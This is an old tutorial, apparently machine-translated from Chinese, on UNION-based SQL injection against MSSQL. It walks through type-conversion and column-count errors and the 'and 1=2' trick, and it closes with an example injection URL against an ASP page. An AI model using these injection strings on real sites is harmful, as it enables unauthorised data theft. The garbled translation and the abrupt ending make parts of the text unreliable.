Union Select In Mssqlunion Select In MSSQL
Text / Safety Angel · Superhei [BST] 2004-11-05
UNION query can say a new sky in SQL injections, Mysql and ACC can play a big role, then what will be in MSSQL? In fact, I started testing Union in MSSQL very early, but I made a big mistake, thinking that UNITION in MSSQL will be affected by the "Data Type Conversion Error", and not to complete the replacement work, actually I am wrong. Thank xiaolu's reminder, THX.
Know
The columns of the data table master.dbo.spt_values are as follows:
Name (nvarchar (35) .null)
Number (int, not null)
TYPE (nchar (3), not null
Low (int, NULL)
HIGH (int, NULL)
Status (int, NULL)
We query statements:
SELECT TYPE from dbo.spt_values where name = 'rpc';
return:
Type
A
Inquire:
SELECT TYPE from dbo.spt_values where name = 'rpc' union select 111;
return:
Server: Message 245, Level 16, State 1, Row 1
A syntax error occurs when converting nVARCHAR value 'a' into a column of data type Int.
did you see it? This is "Data Type Conversion Error", I just saw this talented: (We see what statement Union Select Type from dbo.spt_values where name = 'rpc' Because Name = 'rpc' is returned The type of Type is Nchar and the SELECT 111 after UNION is the data type Int, so the above error occurs when the Union query is.
What will I do if the record of the Selet query in front of our Union does not exist?
We query statements:
SELECT TYPE from dbo.spt_values where name = 'rpcssdfsdfsdfds' union select 111;
Or select Type from dbo.spt_values where name = 'rpc' and 1 = 2 Union Select 111;
In the above statement, Name = 'rpcssdfsdfsdfds' does not exist at all, there is no error, and the result is successful:
Type
111
Let's test a statement: select type, name from dbo.spt_values where name = 'rpc' union select 111; (Query output in front of UNION TYPE and NAME 2 fields)
Get an error:
Server: Message 205, Level 16, State 1, Row 1
All queries in the SQL statement containing the UNION operator must have the same number of expressions in the target list.
Haha ~~ Everyone should be very familiar with this. Union query before and after the fields are wrong. What is the statement, we change it to:
SELECT TYPE, NAME from dbo.spt_values where name = 'rpc' union select 111, 111; (like 2 query fields before and after success) successfully:
TYPE NAME
111 111
Similar statement
Select * from dbo.spt_values where name = 'rpc' union SELECT 1, 1, 1, 1, 1, 1;
Because there are 6 fields in Table SPT_VALUES, there must be 6 fields later in Union.
Oh, in fact, this problem has been mentioned when writing Union queries in MySQL injectation, just re-taken out.
Summary:
For statements SELECT A UNION SELECT B (different data sheets in A and B)
1.Union query compulsory is the field to be b.
2. Union query in MSSQ If the previous query A If the data does not output the data in front of the query A in MySQL, it appears when "Convert NVARCHAR Value 'A' to the data type Int). Error "This error.
In fact, in the injection, our purpose is to obtain the return result of the statement B, using the Union query replacement output must ensure that the result of the statement A is empty, this regardless of mysql, Access is also MSSQL is the same.
So we use an AND 1 = 2 after the ID of the injected ID.
http: //www.xxx.netvideOPlay.asp? VideoID = 1995 and 1 = 2 Union SELECT 1, 1, 1, 1 ......... This form, this and MySQL and ACC use UNION statement Yes, so if we carefully construct our statement, you can make the injection through ACC, MySQL> 4.0, MSSQL, or all data types that support UNION.
Then the writing of our injection tools will have a new beginning, and fortunate death Casi is originally used in actual testing in actual testing. It can also be injected with Access, MSSQL, MySQL. As shown below:
